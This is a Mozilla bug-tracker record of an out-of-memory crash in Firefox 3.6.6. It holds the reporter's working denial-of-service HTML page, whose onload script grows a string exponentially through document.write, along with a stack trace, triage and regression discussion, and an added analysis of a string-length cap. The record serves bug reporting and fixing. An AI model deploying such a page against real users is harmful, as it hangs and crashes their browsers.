Bug 575263
Opened 14 years ago
Closed 6 years ago
Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Categories
(Core :: Layout: Text and Fonts, defect)
Tracking
RESOLVED
WONTFIX
| | Tracking | Status |
|---|---|---|
| status2.0 | --- | unaffected |
| status1.9.2 | --- | wanted |
People
(Reporter: r45c4l, Unassigned)
Details
(Keywords: crash, Whiteboard: [sg:dos OOM] maybe fixed by 565373)
Attachments (1 file): 68.51 KB, text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6

[ EXPL0!T ]

```html
<html>
<title>Mozilla Firefox 3.6.6 Denial of Service by r45c4l </title>
<script>
function junk() {
  var buff = "A";
  // Each pass doubles the string (plus one character) and writes twice
  // its length into the document, so growth is exponential in i.
  for (var i = 0; i < 786; i++) {
    buff += buff + "A";
    document.write(buff + buff);
  }
}
</script>
<body onload="javascript:junk();">
<font color="green">r45c4l<font color="red">[AT]</font>hotmail<font color="green">[DOT]</font>com</font>
</body>
</html>
```

Save the page as [dot]html, open it with Firefox 3.6.6. The browser will hang and then crash.

Reproducible: Always

Actual Results:
Browser hangs and then crashes.
Comment 1•14 years ago
No crash on - Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:1.9.3a6pre) Gecko/20100628 Minefield/3.7a6pre
Crash - Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Severity: normal → major
Comment 2•14 years ago
Updated•14 years ago
blocking1.9.2: --- → ?
Comment 3•14 years ago
Crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 as well
OS: Windows 7 → All
Hardware: x86 → All
Attachment #454514 -
Attachment mime type: application/octet-stream → text/plain
```text
_CxxThrowException
operator new(unsigned int size = 0x692a2c0c)
TextRunWordCache::MakeTextRun(0x00000003, aLength = 0xfffffc6, 0x0a6d4240, 0x0036b548, 0x1000120)+0x91 [e:\builds\moz2_slave\win32_build\build\gfx\thebes\src\gfxtextrunwordcache.cpp @ 707]
MakeTextRun(0x693039ec, 0x36da30, aFontGroup = 0x00000003, 0x0a6dc720, 0)
BuildTextRunsScanner::BuildTextRunForFrames
BuildTextRunsScanner::FlushFrames
BuildTextRuns
_cairo_array_grow_by
USP10!ApplyFeatures+0x645
gfxTextRun::Draw
nsHTMLReflowState::InitConstraints
nsContainerFrame::ReflowChild
CanvasFrame::Reflow
nsContainerFrame::ReflowChild
nsHTMLScrollFrame::ReflowScrolledFrame
nsHTMLScrollFrame::ReflowContents
nsHTMLScrollFrame::Reflow
nsContainerFrame::ReflowChild
ViewportFrame::Reflow
```
Component: General → Layout: Text
Keywords: crash
Product: Firefox → Core
QA Contact: general → layout.fonts-and-text
Summary: Denial of Service in Firefox 3.6.6 → Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Version: unspecified → 1.9.2 Branch
Comment 5•14 years ago
Did a regression range on this issue. Tracemonkey build from May 17th shows the issue; May 18th no longer crashes or hangs. Mozilla Central build from the 18th hangs, meaning that this was fixed on Tracemonkey first.

http://hg.mozilla.org/tracemonkey/pushloghtml?fromchange=e5ae28ee811b&tochange=955bfaadaebb

This has two bugs:
bug 565229 - Bulk clear GC bitmaps when GC starts instead of after the GC ends
bug 565373 - Fix recursing with inlining

I suspect the second is the bug that fixed the issue.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•14 years ago
blocking1.9.2: ? → .8+
status1.9.2: --- → wanted
Depends on: 565373
Whiteboard: [sg:dos OOM] fixed by 565373
Comment 6•14 years ago
I'm not sure 565373 is the fix since that appeared to be fixing a trunk regression after 3.6 branched. But we can try the patch, maybe the regression range is incorrect.
Updated•14 years ago
Whiteboard: [sg:dos OOM] fixed by 565373 → [sg:dos OOM] maybe fixed by 565373
Comment 7•14 years ago
sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try to check it locally as well, but you'd need to be involved anyway to land if it does fix it.
Comment 8•14 years ago
(In reply to comment #7)
> sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try
> to check it locally as well, but you'd need to be involved anyway to land if it
> does fix it.

Is this comment in the right bug?
Comment 9•14 years ago
Yes. This bug is not an issue on trunk as it was fixed in TM which later merged into m-c, and the fix range points to bug 565373 (see comment 5). We'd like bug 565373 backported to the branches if it a) actually fixes this bug's issue and b) is fairly safe.

I'm looking to patch 1.9.2.9 default now with the fix from bug 565373 and test it locally, to make sure the page in comment 1 doesn't cause a crash anymore. I wouldn't be the guy to integrate or determine if we should actually take that on the branch(es) though, which is why I looped you in. If this should go to someone else, let me know.
status2.0: --- → unaffected
Comment 10•14 years ago
...and I just realized we are already tracking bug 565373, so this should probably be closed in favor of doing everything in bug 565373 (once it is determined that this is indeed a dupe of bug 565373).
Comment 11•14 years ago
Al, I may not have time to get to this. If you have time, can you do a local build with the fix from bug 565373 to see if this should be duped off? Thanks!
Comment 12•14 years ago
My HG-fu is weak. While I build debug builds, in general, for testing, I don't know enough HG to know how to pull the patch from bug 565373 and merge it into my local repro. If someone wants to give me simple instructions on how to do it, I can build an optimized build on Windows for this.
Comment 13•14 years ago
Hmmm, doesn't look like there is a js/src/jsrecursion.cpp in 1.9.2...
Comment 14•14 years ago
Didn't we add a limit on JS string length? Was that on trunk or in 1.9.2 already?
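The testcase in the description never finishes its 786 iterations; it exhausts memory long before that, which is why the stack ends in `operator new` throwing. The following is an added example (not the reporter's page and not Mozilla code) that models that growth without allocating it, and shows what a string-length limit of the kind comment 14 asks about changes: the loop fails fast with a catchable `RangeError` at a predictable iteration instead of driving the process out of memory. The cap values used (2^28 and 2^20 characters) are constructed for illustration, not the limits of any Firefox release.

```javascript
// Added example: models the string growth of the bug's testcase.
//
// The reported page starts with buff = "A" and repeats
//     buff += buff + "A";   document.write(buff + buff);
// Each pass maps length L to 2L + 1, so after k passes buff holds
// 2^(k+1) - 1 characters and document.write receives twice that.

// Length of buff after `iterations` passes. BigInt is used because the
// value overflows a double long before 786 passes.
function buffLengthAfter(iterations) {
  let len = 1n;                       // buff = "A"
  for (let i = 0; i < iterations; i++) {
    len = len * 2n + 1n;              // buff += buff + "A"
  }
  return len;
}

// Closed form 2^(k+1) - 1, used to cross-check the loop above.
function buffLengthClosedForm(iterations) {
  return (1n << (BigInt(iterations) + 1n)) - 1n;
}

// First pass (1-based) at which the document.write payload (2 * len)
// would exceed `limit` characters; null if the loop stays under it.
function firstIterationOverLimit(iterations, limit) {
  let len = 1n;
  for (let i = 1; i <= iterations; i++) {
    len = len * 2n + 1n;
    if (len * 2n > limit) return i;
  }
  return null;
}

// A guarded concatenation of the kind an engine-level string-length cap
// amounts to (assumed helper, not a real API): refuse the append with a
// catchable error instead of letting allocation run until OOM.
function appendWithCap(base, extra, cap) {
  if (base.length + extra.length > cap) {
    throw new RangeError("string length cap exceeded");
  }
  return base + extra;
}

// Runs the testcase's loop under the cap and returns the pass at which
// the cap stops it (null if it completes). With cap = 2^20 the loop is
// stopped at pass 20, before any large allocation happens.
function runLoopUnderCap(iterations, cap) {
  let buff = "A";
  for (let i = 1; i <= iterations; i++) {
    try {
      buff = appendWithCap(buff, buff + "A", cap);
    } catch (e) {
      if (e instanceof RangeError) return i;
      throw e;
    }
  }
  return null;
}

// Stand-alone demonstration (constructed limits).
console.log("chars after 786 passes: 2^787 - 1 =",
            buffLengthClosedForm(786).toString().length, "decimal digits");
console.log("payload exceeds 2^28 chars at pass",
            firstIterationOverLimit(786, 1n << 28n));
console.log("capped loop (2^20) stops at pass",
            runLoopUnderCap(786, 1 << 20));
```

The point for triage is the arithmetic: a 2^28-character budget is blown on pass 27 of 786, so any fix that only raises memory headroom moves the crash by a handful of iterations, whereas a hard length limit converts the condition into a thrown exception at a fixed, small iteration count.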
Updated•13 years ago
Crash Signature: [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Comment 15•6 years ago
Closing because no crash has been reported in 12 weeks.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX